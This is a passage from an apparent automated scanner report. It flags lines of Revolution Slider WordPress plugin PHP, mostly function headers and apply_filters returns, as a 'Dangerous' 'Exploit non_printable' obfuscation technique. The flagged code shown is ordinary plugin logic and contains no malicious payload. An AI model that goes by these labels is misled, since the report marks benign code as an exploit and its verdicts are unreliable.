<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">apply_filters</span><span style="color: #007700">(</span><span style="color: #DD0000">'revslider_slide_get_params'</span><span style="color: #007700">, </span><span style="color: #0000BB">apply_filters</span><span style="color: #007700">(</span><span style="color: #DD0000">'revslider_slide_getParams'</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">params</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">), </span><span style="color: #0000BB">$this</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1950</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_param</span><span style="color: #007700">(</span><span style="color: #0000BB">$name</span><span style="color: #007700">, </span><span style="color: #0000BB">$default </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1959</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$a</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 195</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_layers</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1969</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">save_params</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 196</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">apply_filters</span><span style="color: #007700">(</span><span style="color: #DD0000">'revslider_get_layers'</span><span style="color: #007700">, </span><span style="color: #0000BB">apply_filters</span><span style="color: #007700">(</span><span style="color: #DD0000">'revslider_getLayers'</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">layers</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">), </span><span style="color: #0000BB">$this</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1983</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">save_settings</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2005</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_children</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2012</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">apply_filters</span><span style="color: #007700">(</span><span style="color: #DD0000">'revslider_slide_getArrChildren'</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">children</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2020</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">create_slide</span><span style="color: #007700">(</span><span style="color: #0000BB">$slider_id</span><span style="color: #007700">, </span><span style="color: #0000BB">$obj </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$static </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">, </span><span style="color: #0000BB">$id </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 204</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">set_layers_raw</span><span style="color: #007700">(</span><span style="color: #0000BB">$layers</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2064</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">init_by_static_id</span><span style="color: #007700">(</span><span style="color: #0000BB">$slide_id</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2077</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">init_by_data</span><span style="color: #007700">(</span><span style="color: #0000BB">$slide</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 212</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_thumb_url</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 213</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (!empty(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">image_thumb</span><span style="color: #007700">)) ? </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">image_thumb </span><span style="color: #007700">: </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">image_url</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2153</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_slides_for_library</span><span style="color: #007700">(</span><span style="color: #0000BB">$slider_ids </span><span style="color: #007700">= array(), </span><span style="color: #0000BB">$get_static_slide </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2212</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$slides</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 221</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_layer_id_by_uid</span><span style="color: #007700">(</span><span style="color: #0000BB">$uid</span><span style="color: #007700">, </span><span style="color: #0000BB">$static_slide</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2220</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_slides_by_slider_id</span><span style="color: #007700">(</span><span style="color: #0000BB">$slider_id</span><span style="color: #007700">, </span><span style="color: #0000BB">$published </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">, </span><span style="color: #0000BB">$wmpl </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">, </span><span style="color: #0000BB">$first </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">, </span><span style="color: #0000BB">$init_layer </span><span style="color: #007700">= </span><span style="color: #0000BB">true</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2275</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_params_for_export</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2292</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">apply_filters</span><span style="color: #007700">(</span><span style="color: #DD0000">'revslider_slide_getParamsForExport'</span><span style="color: #007700">, </span><span style="color: #0000BB">apply_filters</span><span style="color: #007700">(</span><span style="color: #DD0000">'revslider_slide_getParamsForExport'</span><span style="color: #007700">, </span><span style="color: #0000BB">$params</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">), </span><span style="color: #0000BB">$this</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 229</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">get_val</span><span style="color: #007700">(</span><span style="color: #0000BB">$l</span><span style="color: #007700">, array(</span><span style="color: #DD0000">'attributes'</span><span style="color: #007700">, </span